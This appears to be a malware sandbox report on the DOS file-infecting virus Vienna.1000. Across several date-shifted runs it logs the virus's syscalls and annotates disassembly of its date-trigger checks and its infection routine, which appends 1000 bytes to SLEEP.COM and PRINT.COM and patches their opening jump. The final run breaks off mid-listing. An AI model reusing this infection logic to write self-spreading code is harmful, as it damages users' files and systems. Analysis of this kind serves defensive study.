Sample viewer

vx.netlux.org/Virus.DOS.Vienna.1000


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-17T22:58:07.690525692Z 48 PC: 12e53 | Get DOS version
2018-12-17T22:58:07.691653881Z 47 PC: 12e5f | Get disk transfer address
2018-12-17T22:58:07.693577167Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-17T22:58:07.694950375Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
2018-12-17T22:58:07.697382354Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-17T22:58:07.707141354Z 78 PC: 12f61 | Find first file
2018-12-17T22:58:07.714151452Z 67 PC: 12f9f | Get or set file attributes
2018-12-17T22:58:07.720336304Z 67 PC: 12fb1 | Get or set file attributes
2018-12-17T22:58:07.737920316Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:07.745061529Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-17T22:58:07.746684617Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-17T22:58:07.750124486Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:58:07.757163574Z 66 PC: 12ff9 | Move file pointer
2018-12-17T22:58:07.758735201Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-17T22:58:07.768021393Z 66 PC: 1302f | Move file pointer
2018-12-17T22:58:07.769513598Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:07.780240336Z 87 PC: 13051 | Get or set file date and time
2018-12-17T22:58:07.782372328Z 62 PC: 13055 | Close file
2018-12-17T22:58:07.791876412Z 67 PC: 13064 | Get or set file attributes
2018-12-17T22:58:07.803526186Z 26 PC: 13071 | Set disk transfer address
2018-12-17T22:58:07.805251135Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:58:07.807804813Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:58:07.809100996Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-17T22:58:07.810345243Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
2018-12-17T22:58:07.813716052Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-17T22:58:07.830178805Z 78 PC: 12b79 | Find first file
2018-12-17T22:58:07.837125098Z 79 PC: 12b7f | Find next file
2018-12-17T22:58:07.841041404Z 67 PC: 12bb7 | Get or set file attributes
2018-12-17T22:58:07.847480752Z 67 PC: 12bc9 | Get or set file attributes
2018-12-17T22:58:07.860848803Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:07.869930076Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-17T22:58:07.871793659Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-17T22:58:07.874617957Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:58:07.881844239Z 66 PC: 12c11 | Move file pointer
2018-12-17T22:58:07.890414413Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-17T22:58:07.899740808Z 66 PC: 12c47 | Move file pointer
2018-12-17T22:58:07.901506943Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:07.9175022Z 87 PC: 12c69 | Get or set file date and time
2018-12-17T22:58:07.919732112Z 62 PC: 12c6d | Close file
2018-12-17T22:58:07.928580097Z 67 PC: 12c7c | Get or set file attributes
2018-12-17T22:58:07.940535186Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:12.473868777Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:12.476769101Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:12.481226095Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:12.484779757Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
2018-12-25T12:36:12.487930883Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:12.494102876Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:12.499821459Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:12.703443694Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:12.712343811Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:12.714828978Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:12.718256351Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:12.728810476Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:12.730594861Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:12.742645086Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:12.747498772Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:12.759358712Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:12.76160552Z 62 PC: 13055 | Close file
2018-12-25T12:36:12.775535993Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:12.79310519Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:12.795310193Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:12.797971608Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:12.800172255Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:12.802101021Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
2018-12-25T12:36:12.811826151Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:12.819901305Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:12.824104158Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:12.831594295Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:12.853252294Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:12.866151347Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:12.86851107Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:12.872322968Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:12.885256921Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:12.887446683Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:12.902175541Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:12.903682474Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:12.911193952Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:12.913664103Z 62 PC: 12c6d | Close file
2018-12-25T12:36:12.922871088Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:12.934675372Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:13.905039399Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:13.907742917Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:13.909353298Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:13.910859251Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
; Linear listing from the return address of the second Get date call: month and day checks, then the INT 21h AH=09h display call.
; Not an execution trace: the next row logged in this run is Find first file, with no Display string row.
2018-12-25T12:36:13.91403641Z 42 PC: 12e96 | Get date 0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue with the day check
0x12e9d: jmp 0x12ede  ; month < 10: skip to 0x12ede (past the end of this window)
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date again
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10
0x12ea7: cmp dl, bh  ; dl = day of month
0x12ea9: jge 0x12eae  ; day >= 10: reach the display call
0x12eab: jmp 0x12ede  ; day < 10: skip
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si  ; ds:dx = si + 0x1e, address of the string to print
0x12eb4: mov ah, 9  ; INT 21h AH=09h: print '$'-terminated string
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0  ; clears the byte at ds:0x364; its role is not visible in this window
2018-12-25T12:36:13.916614369Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:13.923517667Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:13.930929747Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:13.951039133Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:13.958302234Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:13.959671135Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:13.963283197Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:13.970392624Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:13.971880338Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:13.989618215Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:13.991458196Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:13.999329806Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.007828652Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.017307929Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.028682533Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.038563779Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.040122637Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.041604679Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.046855494Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
; Linear listing from the return address of the second Get date call: month and day checks, then the INT 21h AH=09h display call.
; Not an execution trace: the next row logged in this run is Find first file, with no Display string row.
2018-12-25T12:36:14.049519627Z 42 PC: 12aae | Get date 0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue with the day check
0x12ab5: jmp 0x12af6  ; month < 9: skip to 0x12af6 (past the end of this window)
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date again
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4
0x12abf: cmp dl, bh  ; dl = day of month
0x12ac1: jge 0x12ac6  ; day >= 4: reach the display call
0x12ac3: jmp 0x12af6  ; day < 4: skip
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si  ; ds:dx = si + 0x1e, address of the string to print
0x12acc: mov ah, 9  ; INT 21h AH=09h: print '$'-terminated string
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0  ; clears the byte at ds:0x364; its role is not visible in this window
2018-12-25T12:36:14.052341018Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.060435031Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.06443641Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.074365369Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.082673454Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.090837819Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.09201588Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.094275916Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.101997422Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.103475721Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.112921795Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.115447242Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.122758498Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.124301186Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.134454095Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.145581291Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:13.923680174Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:13.925585944Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:13.927335464Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:13.928663341Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
2018-12-25T12:36:13.931141156Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:13.942944712Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:13.949720349Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:13.956614069Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:13.97468895Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:13.996903738Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:13.998662013Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
